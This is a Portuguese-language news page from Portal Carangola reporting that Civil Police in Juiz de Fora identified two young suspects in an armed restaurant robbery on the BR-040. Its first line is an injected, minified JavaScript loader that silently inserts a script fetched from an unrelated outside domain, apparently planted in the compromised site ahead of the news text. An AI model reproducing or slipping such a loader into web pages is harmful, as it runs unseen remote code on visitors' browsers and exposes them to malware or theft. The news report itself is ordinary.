;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Polícia Civil identifica suspeitos de roubo em Juiz de Fora. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Polícia Civil identifica suspeitos de roubo em Juiz de Fora.

pcA Polícia Civil, por meio do 4º Departamento de Juiz de Fora e da Delegacia Especializada de Repressão a Roubos, identificou dois homens, de 17 e 19 anos, suspeitos de serem os autores do roubo ocorrido na BR-040, no dia 04 de janeiro deste ano. Eles entraram armados em um restaurante e efetuaram disparos para o teto. Também levaram cerca de R$3.000, celulares e documentos das vítimas.
Conforme a delegada Patrícia Ribeiro, a ação foi possível por meio de mapeamento dos crimes e cruzamento de dados. “E também foram reconhecidos por nove vítimas que estavam no restaurante. Identificamos o menor, que já está acautelado por conta da tentativa de assalto a um delegado aposentado, de 71 anos, no dia 20 de janeiro. E também o maior, que já está preso por ser suspeito do latrocínio, ocorrido em Orvalho, em março”, explicou. Ainda segundo ela, o inquérito será encerrado hoje e remetido à Justiça.
De acordo com o chefe do 4º Departamento de Polícia Civil de Juiz de Fora, delegado geral Saed Divan, esse tipo de crime não é comum em Juiz de Fora. “Mas conseguimos ação rápida, mais uma vez, da Delegacia Especializada de Repressão a Roubos, identificando os suspeitos e tirando os elementos do convívio em sociedade”, concluiu.
Glaciane Vitorino
Assessoria de Comunicação PCMG
Núcleo Avançado do 4º Departamento de Polícia em Juiz de Fora
Telefone:(32) 3692-5657/ (32)3692-5671/ (31) 9387-0118

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.